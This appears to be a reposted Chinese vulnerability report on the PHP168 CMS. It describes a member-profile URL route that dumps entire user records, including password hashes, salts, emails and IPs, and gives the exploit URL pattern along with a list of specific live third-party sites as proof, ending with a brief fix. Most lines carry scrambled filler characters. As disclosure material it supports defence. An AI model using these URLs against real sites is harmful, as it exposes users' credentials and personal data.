|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile( _. y% P. a0 h" l/ W( P& y0 E
/ |# j1 j! h U7 H! @* J$ F. g
以PHP168官方演示站点为例,查看任意用户信息的页面链接为:
: \- E( b# U" m) z7 v6 R) ^" _4 [$ D2 j3 [8 t9 e& d# O+ K
http://php168.cn/com/homepage.php/admin/member-profile
, v# b. [2 j! Z( Z f
) M3 [3 B/ t1 z2 \由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。6 ?4 ~$ W( b) I- Y) l/ a' T
http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg
3 y! Z$ c N1 F" I2 q& F# I: B
( I- r4 \2 {' }! n 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:
/ O, f o+ P. M0 O6 h) r5 J+ s/ y
1 w! [! t s+ R- U+ h4 \4 ghttp://www.zjfzol.com.cn/homepage.php/admin/member-profile/ I9 I8 T# w* Z; E. C' ?0 T$ O# e
3 ]1 h1 X1 j ~0 `http://www.scswl.cn/homepage.php/admin/member-profile- W) F+ U. G" s# _4 [/ \
- ]# q' O/ }3 A+ s( g ^& w
http://www.tunet.edu.cn/homepage.php/admin/member-profile
0 \( u/ E9 J, `! z- i, S! ?7 y( S& n- _" c8 p
http://www.itlead.com.cn/homepage.php/admin/member-profile
8 h3 r0 f# Q+ z/ V# W, J" N/ u5 Y; a
& A) |9 c! \6 bhttp://www.aedp.cn/homepage.php/admin/member-profile- ^9 [9 j4 e8 K( G+ k
/ k" `- Y2 W! k3 J) @( _http://www.qianlongnews.com/homepage.php/test/member-profile
' W" c2 o3 r3 r# F5 D1 T- A9 W; W
) w9 y- s' O: s* P/ }http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]/ R k! t& T/ H! A. Y" n6 _5 z
[/table] |